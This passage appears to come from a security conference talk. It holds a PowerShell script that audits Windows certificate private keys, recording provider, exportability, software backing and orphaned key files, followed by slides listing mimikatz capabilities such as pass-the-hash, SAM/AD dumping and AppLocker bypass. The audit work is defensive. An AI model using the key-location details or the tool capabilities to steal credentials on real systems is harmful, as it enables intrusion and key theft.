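    [string]$Location = 'CurrentUser'
)

# Providers that keep key material in software, inside LSASS (assumed list, used only to label rows)
$SoftwareProviders = @(
    'Microsoft Software Key Storage Provider',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft RSA SChannel Cryptographic Provider'
)

function Get-PrivateKeyInfo {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    $info = [ordered]@{
        Subject = $Cert.Subject; Thumbprint = $Cert.Thumbprint
        Api = $null; Provider = $null; Exportable = $null; Software = $null
        UniqueName = $null   # file name of the key container on disk
    }
    $key = $null
    try {
        $key = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        if ($null -eq $key) {
            $key = [System.Security.Cryptography.X509Certificates.ECDsaCertificateExtensions]::GetECDsaPrivateKey($Cert)
        }
    } catch {
        $info.Provider = "error: $($_.Exception.Message)"
    }
    if ($null -eq $key) { return [pscustomobject]$info }

    if ($key -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        # Legacy CAPI key: the CSP container carries the exportable flag
        $csp = $key.CspKeyContainerInfo
        $info.Api = 'CAPI'; $info.Provider = $csp.ProviderName
        $info.Exportable = $csp.Exportable; $info.UniqueName = $csp.UniqueKeyContainerName
    } elseif ($null -ne $key.PSObject.Properties['Key'] -and $key.Key -is [System.Security.Cryptography.CngKey]) {
        # CNG key (RSACng / ECDsaCng): the export policy is a property held by the KSP
        $cng = $key.Key
        $info.Api = 'CNG'; $info.Provider = $cng.Provider.Provider
        $info.Exportable = ($cng.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0
        $info.UniqueName = $cng.UniqueName
    }
    $info.Software = $SoftwareProviders -contains $info.Provider
    $key.Dispose()
    [pscustomobject]$info
}

function Get-KeyFileRoots {
    param([string]$Location)
    # Documented software key container locations: CNG under Crypto\Keys, CAPI under Crypto\RSA
    if ($Location -eq 'LocalMachine') {
        return @("$env:ProgramData\Microsoft\Crypto\Keys", "$env:ProgramData\Microsoft\Crypto\RSA\MachineKeys")
    }
    $sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    return @("$env:APPDATA\Microsoft\Crypto\Keys", "$env:APPDATA\Microsoft\Crypto\RSA\$sid")
}

$referenced = New-Object 'System.Collections.Generic.HashSet[string]' ([System.StringComparer]::OrdinalIgnoreCase)
$rows = foreach ($store in Get-ChildItem "Cert:\$Location") {
    foreach ($cert in Get-ChildItem "Cert:\$Location\$($store.Name)") {
        if (-not $cert.HasPrivateKey) { continue }
        $row = Get-PrivateKeyInfo -Cert $cert
        Add-Member -InputObject $row -NotePropertyName Store -NotePropertyValue $store.Name
        if ($row.UniqueName) { [void]$referenced.Add($row.UniqueName) }
        $row
    }
}

# Key files no certificate in this location points at: left behind by deleted or re-imported
# certificates, and still exportable by anything that talks to the provider directly
$orphans = foreach ($root in Get-KeyFileRoots -Location $Location) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    Get-ChildItem -LiteralPath $root -File -ErrorAction SilentlyContinue |
        Where-Object { -not $referenced.Contains($_.Name) } |
        ForEach-Object { [pscustomobject]@{ KeyFile = $_.FullName; LastWrite = $_.LastWriteTime } }
}

"== Private keys behind certificates in $Location =="
$rows | Sort-Object Software, Store | Format-Table Store, Api, Software, Exportable, Provider, Subject -AutoSize
"== Key files in $Location with no certificate in any store (candidate orphans) =="
$orphans | Format-Table -AutoSize
```

Rows with Software = True are the ones the patches on the previous slides apply to regardless of the Exportable column; rows backed by a smart card or TPM provider are the ones this slide recommends. Treat the orphan list as candidates: a key file with no certificate in the scanned location may still be legitimately used by a service, so confirm before deleting it.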
mimikatz :: what else can it do?

- play with Minesweeper
- manipulate some handles
- pass-the-hash
- dump SAM / AD
- stop event monitoring
- patch Terminal Server
- basic GPO bypass
- AppLocker / SRP bypass
- driver
  - play with tokens & privileges
  - display the SSDT, x86 & x64
  - list minifilter actions
  - list notifications (process, thread, image, registry)
  - list object hooks and procedures
  - ...
- ...
mimikatz :: that's all folks

Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- the Application Security Forum for offering me this great opportunity
  - partners and sponsors, for sure
- Microsoft, for always considering this normal/acceptable
- security friends and the community for their ideas & challenges
  - nagual, newsoft, mubix, ...
- you, for your attention

Questions?
Don't be shy ;)
... especially if you have noted the corresponding slide number
Blog, Source Code & Contact
  blog:     http://blog.gentilkiwi.com
  mimikatz: http://blog.gentilkiwi.com/mimikatz
  source:   https://code.google.com/p/mimikatz
  email:    benjamin@gentilkiwi.com